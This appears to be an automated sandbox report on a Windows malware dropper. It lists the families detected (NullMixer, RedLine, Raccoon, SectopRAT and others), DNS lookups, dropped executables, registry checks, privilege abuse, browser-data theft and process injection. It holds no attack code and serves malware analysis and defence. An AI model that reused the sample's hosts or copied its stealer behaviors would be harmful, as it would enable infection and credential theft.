US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 27.178.89.13.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

149s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cd42a7c874e44.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cd42a7c874e44.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1600 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1600 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1600 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1600 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1600 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1600 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1600 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1708 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
PID 1708 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
PID 1708 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
PID 1708 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
PID 1708 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
PID 1708 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
PID 1708 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
PID 2752 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
